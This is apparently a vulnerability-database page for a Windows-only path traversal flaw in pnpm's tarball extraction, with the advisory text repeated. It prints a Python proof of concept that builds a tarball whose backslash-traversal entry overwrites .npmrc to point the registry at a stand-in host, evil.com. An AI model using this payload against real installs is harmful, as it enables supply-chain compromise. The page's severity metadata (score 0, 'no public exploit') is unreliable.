What is CVE-2026-23889?

### Summary A path traversal vulnerability in pnpm's tarball extraction allows malicious packages to write files outside the package directory on Windows. The path normalization only checks for `./` but not `.\`. On Windows, backslashes are directory separators, enabling path traversal. **This vulnerability is Windows-only.** ### Details **1. Incomplete Path Normalization (`store/cafs/src/parseTarball.ts:107-110`)** ```typescript if (fileName.includes('./')) { fileName = path.posix.join('/', fileName).slice(1) } ``` A path like `foo\..\..\.npmrc` does NOT contain `./` and bypasses this check. **2. Platform-Dependent Behavior (`fs/indexed-pkg-importer/src/importIndexedDir.ts:97-98`)** - On Unix: Backslashes are literal filename characters (safe) - On Windows: Backslashes are directory separators (exploitable) ### PoC 1. Create a malicious tarball with entry `package/foo\..\..\.npmrc` 2. Host it or use as a tarball URL dependency 3. On Windows: `pnpm install` 4. Observe `.npmrc` written outside package directory ```python import tarfile, io tar_buffer = io.BytesIO() with tarfile.open(fileobj=tar_buffer, mode='w:gz') as tar: pkg_json = b'{"name": "malicious-pkg", "version": "1.0.0"}' pkg_info = tarfile.TarInfo(name='package/package.json') pkg_info.size = len(pkg_json) tar.addfile(pkg_info, io.BytesIO(pkg_json)) malicious_content = b'registry=https://evil.com/\n' mal_info = tarfile.TarInfo(name='package/foo\\..\\..\\.npmrc') mal_info.size = len(malicious_content) tar.addfile(mal_info, io.BytesIO(malicious_content)) with open('malicious-pkg-1.0.0.tgz', 'wb') as f: f.write(tar_buffer.getvalue()) ``` ### Impact - Windows pnpm users - Windows CI/CD pipelines (GitHub Actions Windows runners, Azure DevOps) - Can overwrite `.npmrc`, build configs, or other files Verified on pnpm main @ commit 5a0ed1d45.

What is the severity of CVE-2026-23889?

CVE-2026-23889 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2026-23889?

No known public exploits are currently available for CVE-2026-23889.

Is there a patch available for CVE-2026-23889?

Yes, patches are available for CVE-2026-23889. Check the vendor advisories for update instructions.

CVE-2026-23889 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v30.0

CVSS v20.0

Priority Score0.0

EPSS Score0.0

None

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

0.0

CVSS

No

Exploit

Yes

Patch

Low Priority

no major risk factors

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Summary

A path traversal vulnerability in pnpm's tarball extraction allows malicious packages to write files outside the package directory on Windows. The path normalization only checks for ./ but not .\. On Windows, backslashes are directory separators, enabling path traversal.

This vulnerability is Windows-only.

Details

1. Incomplete Path Normalization (store/cafs/src/parseTarball.ts:107-110)

if (fileName.includes('./')) {
  fileName = path.posix.join('/', fileName).slice(1)
}

A path like foo\..\..\.npmrc does NOT contain ./ and bypasses this check.

2. Platform-Dependent Behavior (fs/indexed-pkg-importer/src/importIndexedDir.ts:97-98)

On Unix: Backslashes are literal filename characters (safe)
On Windows: Backslashes are directory separators (exploitable)

PoC

Create a malicious tarball with entry package/foo\..\..\.npmrc
Host it or use as a tarball URL dependency
On Windows: pnpm install
Observe .npmrc written outside package directory

import tarfile, io

tar_buffer = io.BytesIO()
with tarfile.open(fileobj=tar_buffer, mode='w:gz') as tar:
    pkg_json = b'{"name": "malicious-pkg", "version": "1.0.0"}'
    pkg_info = tarfile.TarInfo(name='package/package.json')
    pkg_info.size = len(pkg_json)
    tar.addfile(pkg_info, io.BytesIO(pkg_json))

    malicious_content = b'registry=https://evil.com/\n'
    mal_info = tarfile.TarInfo(name='package/foo\\..\\..\\.npmrc')
    mal_info.size = len(malicious_content)
    tar.addfile(mal_info, io.BytesIO(malicious_content))

with open('malicious-pkg-1.0.0.tgz', 'wb') as f:
    f.write(tar_buffer.getvalue())

Impact

Windows pnpm users
Windows CI/CD pipelines (GitHub Actions Windows runners, Azure DevOps)
Can overwrite .npmrc, build configs, or other files

CVSS v3 Breakdown

Attack Vector:-

Attack Complexity:-

Privileges Required:-

User Interaction:-

Scope:-

Confidentiality:-

Integrity:-

Availability:-

Patch References

Github.com Github.com